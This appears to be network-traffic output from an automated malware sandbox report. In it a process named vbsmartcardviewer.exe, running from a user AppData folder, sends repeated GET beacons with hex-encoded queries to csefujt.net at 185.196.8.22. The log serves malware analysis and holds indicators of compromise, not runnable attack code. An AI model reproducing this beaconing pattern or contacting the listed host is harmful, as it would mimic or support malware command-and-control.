                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                18192.168.2.649755185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:42.187668085 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:42.429614067 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:42 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                19192.168.2.649756185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:42.758116007 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:42.998167992 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:42 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                20192.168.2.649757185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:43.327039003 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:43.569910049 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:43 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:43.682686090 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:43.919538975 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:43 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                21192.168.2.649758185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:44.270222902 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:44.512965918 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:44 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                22192.168.2.649759185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:44.840574980 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:45.080754995 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:44 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                23192.168.2.649760185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:45.405688047 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:45.650687933 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:45 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                24192.168.2.649761185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:45.985249996 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:46.226401091 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:46 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                25192.168.2.649762185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:46.563461065 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:46.800832033 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:46 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                26192.168.2.649763185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:47.124027014 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:47.365269899 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                27192.168.2.649764185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:47.731920958 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:47.968765020 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                28192.168.2.649765185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:48.304836035 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:48.547673941 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:48 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                29192.168.2.649766185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:48.876193047 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:49.118072033 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                30192.168.2.649767185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:49.456620932 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:49.693525076 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:49.804976940 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:50.042098999 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                31192.168.2.649768185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:50.378453016 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:50.618350029 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                32192.168.2.649769185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:50.942732096 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:51.184355021 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
